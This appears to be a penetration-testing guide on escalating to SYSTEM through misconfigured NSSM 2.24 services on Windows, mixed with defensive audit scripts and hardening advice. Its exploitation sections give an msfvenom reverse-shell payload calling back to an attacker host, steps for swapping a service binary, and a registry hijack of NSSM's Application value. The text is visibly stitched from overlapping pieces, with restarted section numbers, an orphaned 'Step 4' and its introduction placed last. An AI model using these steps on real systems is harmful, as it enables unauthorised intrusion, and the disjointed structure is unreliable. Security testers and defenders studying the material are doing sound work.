NSSM 2.24 Privilege Escalation (Updated)
This guide outlines how to identify and exploit misconfigurations around the Non-Sucking Service Manager (NSSM), often searched for as "nssm224" (a reference to the long-standing 2.24 release), to elevate privileges from a standard user to SYSTEM on Windows.

1. Understanding the Vulnerability
NSSM is a wrapper that runs ordinary applications as Windows services. The weakness described here is not a bug in NSSM itself: privilege escalation becomes possible when a service runs as LocalSystem but the executable it launches, the directory that executable lives in, or the NSSM configuration that names that executable can be modified by a low-privileged user. Common misconfigurations:
Unquoted Service Paths: The service path contains spaces and is not quoted, so Windows tries each space-delimited prefix as a program name before the intended binary, and a malicious executable planted at one of those prefixes runs instead.
Weak File Permissions: The executable (nssm.exe or the application it wraps) or its directory grants Write (W), Modify (M) or Full Control (F) to Authenticated Users, Users or Everyone.
2. Enumeration (Finding the Target)
First, identify services that run as SYSTEM, start automatically and have weak permissions. NSSM-managed services show nssm.exe as the service binary; the application they actually launch is named in the service's Parameters registry key, so check that path too. Use the command prompt or PowerShell.
List service details:
wmic service get name,displayname,pathname,startmode | findstr /i "auto"
(wmic is deprecated on current Windows builds; Get-CimInstance Win32_Service returns the same fields plus StartName, the account the service runs as.)
Check permissions on executables: use icacls to check whether your user has write access to the service binary, and repeat for the directory it lives in and, for NSSM services, for the wrapped application:
icacls "C:\Path\To\Service\Binary.exe"
Look for (F) (Full Control), (M) (Modify) or (W) (Write) granted to Users, Authenticated Users or Everyone. icacls prints the DACL, not your effective rights: an entry marked (IO) is inherit-only and does not apply to the object itself, and a Deny entry overrides an Allow.

3. Exploitation Steps (Updated Approach)
Once a vulnerable service is found, follow these steps:
Create a Malicious Payload: Generate a reverse shell with msfvenom or a small executable that adds a user to the local Administrators group.
msfvenom -p windows/x64/shell_reverse_tcp LHOST=<attacker IP> LPORT=<port> -f exe-service -o service.exe
The output format depends on what you are replacing. If you replace the binary registered with the Service Control Manager, it must behave like a service (exe-service wraps the payload in a service stub); a plain exe is killed by the SCM once the start timeout expires, although the shell has usually connected back by then. If you replace the application that nssm.exe wraps, NSSM remains the service binary and your payload is only its child process, so -f exe is enough.
Replace the Service Binary: Rename the legitimate executable and copy your payload into its place. Renaming works even while the service is running (Windows blocks deleting or overwriting a mapped image, not renaming it on the same volume), which is why the sequence is move then copy rather than copying over the file:
move "C:\Path\To\Service\Binary.exe" "C:\Path\To\Service\Binary.exe.bak"
copy "C:\Temp\service.exe" "C:\Path\To\Service\Binary.exe"
Restart the Service: If the service DACL lets you stop and start it, do so; inspect it with sc sdshow <ServiceName> or accesschk -ucqv <ServiceName>. If not, wait for a reboot, or trigger one yourself if your account holds SeShutdownPrivilege.
sc stop <ServiceName>
sc start <ServiceName>
Obtain Shell: Catch the reverse shell as NT AUTHORITY\SYSTEM.

4. Prevention and Mitigation
Quote Service Paths: Ensure every service ImagePath is enclosed in quotes so that a path containing spaces cannot be intercepted.
Restrict Permissions: Apply the principle of least privilege. Only Administrators and SYSTEM should have write access to service directories, service binaries, the applications NSSM wraps and the NSSM Parameters registry keys.
Update NSSM: Use a current NSSM build, but note that upgrading removes none of the weaknesses above; they are configuration errors, and the fix is correcting the ACLs and paths.
While there is no vulnerability ID specific to NSSM 2.24, NSSM version 2.24 turns up frequently in local privilege escalation (LPE) scenarios because of its role as a service wrapper and the configuration mistakes that tend to accompany it.

1. Common Privilege Escalation Vectors
In environments using NSSM 2.24, attackers typically look for the following misconfigurations to escalate to SYSTEM:
Unquoted Service Paths: If the path to the executable NSSM manages contains spaces and is not enclosed in quotes (e.g., C:\Program Files\App Name\nssm.exe), Windows tries C:\Program.exe and then C:\Program Files\App.exe before the intended binary, so an attacker who can create a file at one of those locations gets it executed as SYSTEM at the next service start or reboot. By default standard users cannot create files directly in C:\ or C:\Program Files, so the candidate inside an application-specific directory with a loose ACL is usually the practical one.
Weak Folder Permissions: If a low-privileged user has Write or Full Control over the folder containing nssm.exe or the application it wraps, they can replace the binary with a malicious one.
Binary Hijacking: Similarly, if the service binary or the wrapped application itself is writable by everyone, it can be replaced with a reverse shell or other implant.

2. Exploitation Checklist
To test for or identify these weaknesses, security professionals use tools and manual commands:
Wazuh Integration: Organizations can follow the Wazuh blog guide to monitor for suspicious services created with NSSM.
Manual Check for Unquoted Paths:
wmic service get name,displayname,pathname,startmode | findstr /i "Auto" | findstr /i /v "C:\Windows\\" | findstr /i /v """
(The last filter drops every line containing a double quote, leaving only unquoted paths; the second drops services under C:\Windows, which are normally correctly permissioned.)
Permission Verification: Check with icacls whether the Users, Authenticated Users or Everyone groups hold write rights on the service folder, the service binary and, for NSSM services, the wrapped application.

3. Mitigation & Hardening
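The enumeration and permission checks above, as an added example that is not part of the original guide: a PowerShell script that lists auto-start services running as LocalSystem, computes the hijack candidates Windows would try for an unquoted path, and reports any binary, image directory or candidate directory on which Users, Authenticated Users, Everyone or INTERACTIVE hold create-or-write rights. The principal list, the rights regex and the output columns are this example's own choices, not anything the page or NSSM defines.

```powershell
# Added example (not from the original page). Run as the low-privileged user
# under test; it is read-only and changes nothing on the host.

# Principals an unprivileged logon normally belongs to (assumption: extend for
# site-specific groups).
$LowPrivPrincipal = '^(BUILTIN\\Users|NT AUTHORITY\\Authenticated Users|Everyone|NT AUTHORITY\\INTERACTIVE)$'
# FileSystemRights that allow creating or replacing a file in the object checked.
$WriteLikeRights  = 'FullControl|Modify|Write|CreateFiles|ChangePermissions|TakeOwnership'

function Get-WeakFileAce {
    # Allow ACEs on $Path granting write-like rights to low-privileged principals.
    # Inherit-only entries are skipped because they do not apply to the object
    # itself (C:\ grants Authenticated Users Modify on children only, for example).
    param([Parameter(Mandatory)][string]$Path)
    if (-not (Test-Path -LiteralPath $Path)) { return @() }
    try { $acl = Get-Acl -LiteralPath $Path -ErrorAction Stop } catch { return @() }
    @($acl.Access | Where-Object {
        $_.AccessControlType -eq 'Allow' -and
        $_.IdentityReference.Value -match $LowPrivPrincipal -and
        $_.FileSystemRights.ToString() -match $WriteLikeRights -and
        $_.PropagationFlags.ToString() -notmatch 'InheritOnly'
    })
}

function Get-ImagePath {
    # Extracts the executable from a Win32_Service.PathName, quoted or not.
    param([Parameter(Mandatory)][string]$PathName)
    if ($PathName.StartsWith('"')) {
        $end = $PathName.IndexOf('"', 1)
        if ($end -gt 1) { return $PathName.Substring(1, $end - 1) }
    }
    $m = [regex]::Match($PathName, '^(.*?\.exe)(\s|$)', 'IgnoreCase')
    if ($m.Success) { return $m.Groups[1].Value }
    return ($PathName -split '\s+')[0]
}

function Get-HijackCandidate {
    # Prefixes CreateProcess tries before the real binary for an unquoted path:
    # 'C:\Program Files\App Name\nssm.exe' -> 'C:\Program.exe', 'C:\Program Files\App.exe'
    param([Parameter(Mandatory)][string]$ImagePath)
    $parts = $ImagePath -split ' '
    for ($i = 1; $i -lt $parts.Count; $i++) {
        ($parts[0..($i - 1)] -join ' ') + '.exe'
    }
}

function Find-WeakService {
    Get-CimInstance -ClassName Win32_Service |
        Where-Object { $_.StartMode -eq 'Auto' -and $_.StartName -eq 'LocalSystem' -and $_.PathName } |
        ForEach-Object {
            $svc = $_
            $img = Get-ImagePath -PathName $svc.PathName
            $findings = @()
            if (-not $svc.PathName.StartsWith('"') -and $img.Contains(' ')) {
                foreach ($cand in Get-HijackCandidate -ImagePath $img) {
                    # Planting the candidate needs create-file rights in its directory.
                    if (Get-WeakFileAce -Path (Split-Path -Path $cand -Parent)) {
                        $findings += "unquoted path, can plant $cand"
                    }
                }
            }
            if (Get-WeakFileAce -Path $img) { $findings += "binary writable: $img" }
            $dir = Split-Path -Path $img -Parent
            if (Get-WeakFileAce -Path $dir) { $findings += "directory writable: $dir" }
            if ($findings.Count -gt 0) {
                [pscustomobject]@{
                    Service  = $svc.Name
                    PathName = $svc.PathName
                    Findings = ($findings -join '; ')
                }
            }
        }
}

Find-WeakService | Format-List
```

The script inspects explicit DACL entries rather than computing effective access, so it neither resolves nested group membership nor honours Deny entries; treat a hit as a lead to confirm with icacls or by actually attempting to create a file, not as proof. For NSSM services the PathName it sees is nssm.exe; run Get-WeakFileAce against the Application value from the service's Parameters key as well.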
To secure systems running NSSM 2.24, follow these practices:
Upgrade NSSM: Version 2.24 has known bugs, including a possible crash-and-restart loop when run without administrator rights; the pre-release builds (2.25) address several stability and privilege-handling issues. Upgrading is housekeeping rather than a fix for the vectors above, which are ACL and path errors.
Enforce Quoted Paths: Ensure every service's ImagePath value under HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services is properly quoted.
Principle of Least Privilege (PoLP): Restrict write access to service directories, binaries, wrapped applications and the NSSM Parameters keys to Administrators and SYSTEM only.
Monitor Service Creation: Audit the System event log for new service installations (Event ID 7045 from Service Control Manager) and, where auditing of security system extensions is enabled, Security log Event ID 4697, since attackers often use NSSM to establish persistence.
For further research on Windows escalation techniques, refer to the MITRE ATT&CK Privilege Escalation tactic (TA0004): Privilege Escalation consists of techniques that adversaries use to gain higher-level permissions on a system or network. The techniques that map to this page are T1574.009 (Path Interception by Unquoted Path), T1574.010 (Services File Permissions Weakness) and T1574.011 (Services Registry Permissions Weakness).
NSSM 2.24 is an old release but is still shipped by a great deal of legitimate software, and attackers use it for the same reason: a wrapper that starts an arbitrary executable as SYSTEM and restarts it on failure is convenient persistence. Its known defects (the crash-and-restart loop when it needs elevation and lacks it, and service launch failures on newer Windows versions without specific registry settings) are reliability problems; the security exposure comes from unquoted service paths and misconfigured service or file permissions, which let an attacker execute arbitrary code with the service's privileges, usually LocalSystem.
A note on a widely repeated claim: some summaries describe a 2019 paper and a CVE for a privilege-escalation bug in "NSSM version 224". No such NSSM-specific advisory exists, and the identifier usually quoted, CVE-2019-1253, is a Microsoft Windows elevation-of-privilege vulnerability in the AppX Deployment Service (AppXSvc) that has nothing to do with NSSM. NSSM also does not load "configuration files" from a directory; its per-service settings live in the registry under the service's Parameters key. The escalation paths that do exist are the configuration weaknesses this guide describes: writable binaries or directories, unquoted paths, and writable Parameters keys.
Here is a concise technical overview of NSSM 2.24 and its place in privilege escalation scenarios (updated perspective):

3.1 Registry ACL Weakness
NSSM reads everything it needs from the registry at service start: HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\<service>\Parameters holds Application (the executable to launch), AppDirectory, AppParameters and related values. In some older NSSM versions or manual installs, that Parameters key may carry ACLs that let Authenticated Users or Users set values.
Attack: change the Application value to point to a malicious executable, then restart the service; nssm.exe, running as SYSTEM, launches the new path. No write access to any existing binary is needed, since Application can point at a file in any user-writable location.

Step 4: Restart the Service
net stop nssm_managed_service && net start nssm_managed_service
If successful, the attacker's reverse_shell.exe runs as SYSTEM. As with the file-replacement approach, this needs stop/start rights on the service or a reboot.
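The registry vector above, as an added example that is not part of the original page or of the NSSM project: a PowerShell function that finds every service whose binary is nssm.exe, reads the Application, AppDirectory and AppParameters values from its Parameters key, and reports whether Users, Authenticated Users, Everyone or INTERACTIVE hold an Allow ACE on that key with SetValue, CreateSubKey, WriteKey, FullControl or ownership/permission-change rights. The principal list and the output columns are this example's own choices.

```powershell
# Added example (not from the original page or the NSSM project). Read-only; it
# needs only the read access that HKLM\SYSTEM\CurrentControlSet\Services grants
# to ordinary users.

# Low-privileged principals to flag (assumption: extend for site-specific groups).
$LowPrivPrincipal = '^(BUILTIN\\Users|NT AUTHORITY\\Authenticated Users|Everyone|NT AUTHORITY\\INTERACTIVE)$'
# RegistryRights that let a caller change what NSSM launches.
$RegWriteRights   = 'FullControl|WriteKey|SetValue|CreateSubKey|ChangePermissions|TakeOwnership'

function Get-NssmServiceAudit {
    Get-CimInstance -ClassName Win32_Service |
        Where-Object { $_.PathName -match 'nssm(64)?\.exe' } |
        ForEach-Object {
            $svc = $_
            $key = "HKLM:\SYSTEM\CurrentControlSet\Services\$($svc.Name)\Parameters"
            # 'return' inside ForEach-Object only skips this item.
            if (-not (Test-Path -Path $key)) { return }
            $p = Get-ItemProperty -Path $key -ErrorAction SilentlyContinue

            # Explicit Allow ACEs on the key held by low-privileged principals;
            # inherit-only entries do not apply to the key itself and are skipped.
            $weak = @()
            try {
                $weak = @((Get-Acl -Path $key -ErrorAction Stop).Access | Where-Object {
                    $_.AccessControlType -eq 'Allow' -and
                    $_.IdentityReference.Value -match $LowPrivPrincipal -and
                    $_.RegistryRights.ToString() -match $RegWriteRights -and
                    $_.PropagationFlags.ToString() -notmatch 'InheritOnly'
                })
            } catch { }

            [pscustomobject]@{
                Service       = $svc.Name
                RunsAs        = $svc.StartName
                StartMode     = $svc.StartMode
                Wrapper       = $svc.PathName
                Application   = $p.Application
                AppDirectory  = $p.AppDirectory
                AppParameters = $p.AppParameters
                KeyWritableBy = (@($weak | ForEach-Object { $_.IdentityReference.Value }) -join ', ')
            }
        }
}

# Every NSSM-wrapped service; a non-empty KeyWritableBy on a service that RunsAs
# LocalSystem is the exploitable condition described above.
Get-NssmServiceAudit | Sort-Object KeyWritableBy -Descending | Format-List
```

An empty KeyWritableBy does not clear the service: run the icacls checks from the enumeration section against the Application path and its directory, since a writable wrapped binary gives the same result without touching the registry. For remediation, the key and the wrapped application should be writable by Administrators and SYSTEM only.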
What is NSSM 2.24? A Quick Refresher
NSSM lets you run as a Windows service any executable that does not implement the service control protocol itself. Like any service created with sc create, an NSSM-installed service runs as LocalSystem (the highest-privileged local account) unless another account is specified at install time.
Common use cases include:
- Running Node.js or Python apps as services.
- Wrapping legacy batch files.
- Keeping PowerShell scripts alive after logoff.
This convenience has a dangerous side effect: if an unprivileged user can change what NSSM executes, whether by writing to the wrapped executable, to its directory, or to the Application value in the registry, they gain immediate privilege escalation to SYSTEM.
Introduction
"NSSM-224" is not a tracked vulnerability identifier; it is shorthand for the Non-Sucking Service Manager (NSSM) release 2.24, the most widely deployed build, and the privilege escalation associated with it is a class of configuration weakness rather than a bug in the utility. The vector keeps reappearing in penetration test reports and red team operations because NSSM-wrapped services so often run as SYSTEM and so often point at executables, directories or registry values that ordinary users can modify.
This article walks through the mechanics of that escalation, why it remains effective on fully patched systems (Windows updates do not correct a mis-set ACL or an unquoted path), and how defenders can detect and mitigate the risk.


